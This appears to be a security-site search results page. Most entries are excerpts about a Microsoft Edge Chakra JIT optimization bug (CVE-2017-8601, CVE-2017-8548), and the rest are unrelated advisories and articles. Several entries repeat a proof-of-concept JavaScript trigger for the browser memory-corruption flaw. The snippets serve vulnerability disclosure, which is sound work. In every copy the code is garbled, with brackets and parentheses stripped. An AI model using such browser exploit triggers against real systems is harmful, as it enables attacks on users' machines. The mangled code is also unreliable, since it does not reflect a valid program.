2514 matches found
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3 Exploit
Exploit for windows platform in category dos / poc 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on Microsoft Edge 40.15063.0.0Insider...
Microsoft Edge Chakra Incorrect Jit Optimization Exploit
Yet another finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient. Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 3 CVE-2017-8601 Coincidentally, Microsoft released the patch for the issue 1290 the d...
Microsoft Edge Chakra Incorrect Jit Optimization
Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 3 CVE-2017-8601 Coincidentally, Microsoft released the patch for the issue 1290 the day after I reported it. But it seems they fixed it incorrectly again. This time, "funca, b, i;" is replaced with "funca, b, ;". PoC: 'use...
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on Microsoft Edge 40.15063.0.0Insider Preview...
Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #3(CVE-2017-8601)
Coincidentally, Microsoft released the patch for the issue 1290 the day after I reported it. But it seems they fixed it incorrectly again. This time, "funca, b, i;" is replaced with "funca, b, ;". PoC: 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main...
Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2(CVE-2017-8548)
I think the fix for 1045 is incorrect. Here's the original PoC. 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array100; // force to optimize for var i = 0; i a0 = ; return 0; ; a0.toString; main; I just changed...
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3
Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter 3 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on...
Microsoft Edge Chakra Incorrect Jit Optimization Exploit
This is a follow-up finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient. Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 2 CVE-2017-8548 I think the fix for 1045 is incorrect. Here's the original Po...
Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2
a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array0; // 0 // force t...
Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2
Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter 2 a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-32...
Microsoft Edge Chakra Incorrect Jit Optimization
Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 2 CVE-2017-8548 I think the fix for 1045 is incorrect. Here's the original PoC. 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array100; //...
rustgo: calling Rust from Go with near-zero overhead
русский Go has good support for calling into assembly, and a lot of the fast cryptographic code in the stdlib is carefully optimized assembly, bringing speedups of over 20 times. However, writing assembly code is hard, reviewing it is possibly harder, and cryptography is unforgiving. Wouldn't it ...
[SECURITY] Fedora 26 Update: varnish-5.1.3-2.fc26
This is Varnish Cache, a high-performance HTTP accelerator. Varnish Cache stores web pages in memory so web servers don=EF=BF=BD=EF=BF =BD=EF=BF=BDt have to create the same web page over and over again. Varnish Cache serves pages much faster than any application server; giving the website a...
Qemu: i386: leakage of stack memory to guest in kvmvapic.c
An information-exposure flaw was found in Quick Emulator QEMU in Task Priority Register TPR optimizations for 32-bit Windows guests. The flaw could occur while accessing TPR. A privileged user inside a guest could use this issue to read portions of the host memory...
Cross-site Scripting (XSS)
Concrete5 is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary web script because the library does not sanitize it's parameters before rendering them for display. The following fields are affected: bannedword in...
How To Define Page File Size and Placement in Citrix App Layering 4.x
To provide Citrix customers and users a process to define page file size and location when using Citrix App Layering...
Microsoft Chakra Array JIT Optimization Type Confusion Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling o...
Microsoft Chakra Typed Array JIT Optimization Use-After-Free Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Chakra. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the generation ...
CentOS 7 : kernel (CESA-2017:1615)
An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from th...
Unidesk Recipe for NP Desktop Logon Time Optimization v3
One very popular use case for VDI is for kiosk or lab machines. Uses for these types of desktops include classroom labs, library access and general computing in schools and corporations. Architects and Administrators of these types of use cases generally want to be able to define default...